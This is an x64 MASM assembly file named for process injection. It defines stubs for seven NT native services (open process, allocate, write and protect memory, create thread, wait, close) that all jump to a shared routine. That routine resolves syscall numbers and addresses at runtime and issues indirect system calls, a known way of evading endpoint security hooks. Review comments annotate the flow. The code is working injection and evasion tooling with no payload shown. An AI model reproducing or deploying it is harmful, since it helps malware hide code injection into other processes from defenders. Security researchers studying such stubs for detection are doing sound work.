inject-asm.x64.asm
.code
EXTERN getGlobalHash: PROC
EXTERN SW3_GetSyscallNumber: PROC
EXTERN SW3_GetSyscallAddress: PROC
; Entry points named after seven NT native services (allocate / write / protect
; virtual memory, open process, create thread, wait for object, close handle).
; Every body is a single tail-jump to pipo: nothing here touches the argument
; registers or the stack, so pipo sees the original caller's rcx/rdx/r8/r9,
; stack arguments and return address unchanged.
; NOTE(review): nothing in these bodies records which entry point was used.
; pipo obtains a value from getGlobalHash instead, so the caller presumably
; sets that value before calling - confirm against the C side.
Sw3NtAllocateVirtualMemory PROC
jmp pipo
Sw3NtAllocateVirtualMemory ENDP
Sw3NtWaitForSingleObject PROC
jmp pipo
Sw3NtWaitForSingleObject ENDP
Sw3NtCreateThreadEx PROC
jmp pipo
Sw3NtCreateThreadEx ENDP
Sw3NtClose PROC
jmp pipo
Sw3NtClose ENDP
Sw3NtWriteVirtualMemory PROC
jmp pipo
Sw3NtWriteVirtualMemory ENDP
Sw3NtProtectVirtualMemory PROC
jmp pipo
Sw3NtProtectVirtualMemory ENDP
Sw3NtOpenProcess PROC
jmp pipo
Sw3NtOpenProcess ENDP
;-----------------------------------------------------------------------
; pipo - shared stub reached by `jmp` from every Sw3Nt* entry point above.
; ABI:   Microsoft x64 (MASM syntax).
; In:    rcx, rdx, r8, r9 = first four arguments of the original caller;
;        [rsp] = the original caller's return address (the entry points
;        jump here, they do not call).
; Flow:  spill the four register arguments, pass the value returned by
;        getGlobalHash to SW3_GetSyscallAddress and then to
;        SW3_GetSyscallNumber, reload the arguments, copy rcx to r10 and
;        jump to the address the first helper returned.
; Out:   does not return here; control leaves through `jmp r11` with rax
;        holding the return value of SW3_GetSyscallNumber.
; NOTE(review): the helper names suggest r11 = address of a syscall
; instruction and eax = system call number; neither helper is defined in
; this file - confirm.
; NOTE(review): for triage, this file declares no EXTERN for the Nt*
; routines themselves (only the three helpers), and the final transfer is
; an indirect jump to a runtime-computed address rather than a call to a
; named symbol.
;-----------------------------------------------------------------------
pipo PROC
; Spill the register arguments into the 32-byte home area that the
; Microsoft x64 convention has the caller reserve above the return address.
mov [rsp +8], rcx
mov [rsp+16], rdx
mov [rsp+24], r8
mov [rsp+32], r9
; 28h = 32 bytes of home space for the callees + 8 bytes so that rsp is
; 16-byte aligned at the calls below.
sub rsp, 28h
call getGlobalHash ; remove hash
; rcx = first argument of the helper = value returned by getGlobalHash
mov rcx, rax
call SW3_GetSyscallAddress
; keep the returned address in r11 for the final jump
mov r11, rax
; getGlobalHash is called a second time rather than reusing the earlier value
call getGlobalHash ; remove hash
mov rcx, rax
call SW3_GetSyscallNumber
; rax now holds SW3_GetSyscallNumber's return value and is left untouched
; until the jump.
add rsp, 28h
; Reload the original caller's register arguments from the home area.
mov rcx, [rsp+8]
mov rdx, [rsp+16]
mov r8, [rsp+24]
mov r9, [rsp+32]
; r10 = first argument (copy of rcx)
mov r10, rcx
; Tail-jump: the original caller's return address is still at [rsp].
jmp r11
pipo ENDP
end